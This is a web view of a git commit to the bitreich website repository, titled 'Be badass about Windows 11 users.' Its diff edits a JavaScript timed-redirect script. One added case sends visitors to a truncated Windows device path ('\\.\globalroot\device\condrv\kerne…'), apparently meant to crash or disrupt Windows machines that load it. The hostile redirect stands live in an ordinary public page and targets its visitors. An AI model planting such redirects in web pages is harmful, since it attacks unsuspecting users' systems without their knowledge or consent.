Be badass about Windows 11 users. - bitreich-www - the bitreich www website gen… | |
Log | |
Files | |
Refs | |
Tags | |
--- | |
commit da4476b09db9d1a078c2ca1e36b71d237b899ee1 | |
parent fa399095984f8815e0e652df354675d07719f214 | |
Author: Christoph Lohmann <[email protected]> | |
Date: Fri, 19 Jul 2024 20:31:23 +0200 | |
Be badass about Windows 11 users. | |
Diffstat: | |
M 9-redirect.html | 5 ++++- | |
M index.html | 2 +- | |
2 files changed, 5 insertions(+), 2 deletions(-) | |
--- | |
diff --git a/9-redirect.html b/9-redirect.html | |
@@ -6,7 +6,7 @@ var now = new Date(); | |
var today = now.getDay(); | |
setTimeout(function() { | |
- switch (today % 16) { | |
+ switch (today % 18) { | |
case 1: | |
window.location.href="http://zuckless.org"; | |
break; | |
@@ -51,6 +51,9 @@ setTimeout(function() { | |
case 14: | |
window.location.href="https://everything.npm.lol/"; | |
break; | |
+ case 15: | |
+ window.location.href="\\\\.\\globalroot\\device\\condrv\\kerne… | |
+ break; | |
default: | |
window.location.href="http://zuccless.org"; | |
break; | |
diff --git a/index.html b/index.html | |
@@ -464,7 +464,7 @@ setTimeout(function() { | |
window.location.href="https://everything.npm.lol/"; | |
break; | |
default: | |
- window.location.href="http://zuckless.org"; | |
+ window.location.href="http://zuccless.org"; | |
break; | |
} | |
}, 500000); |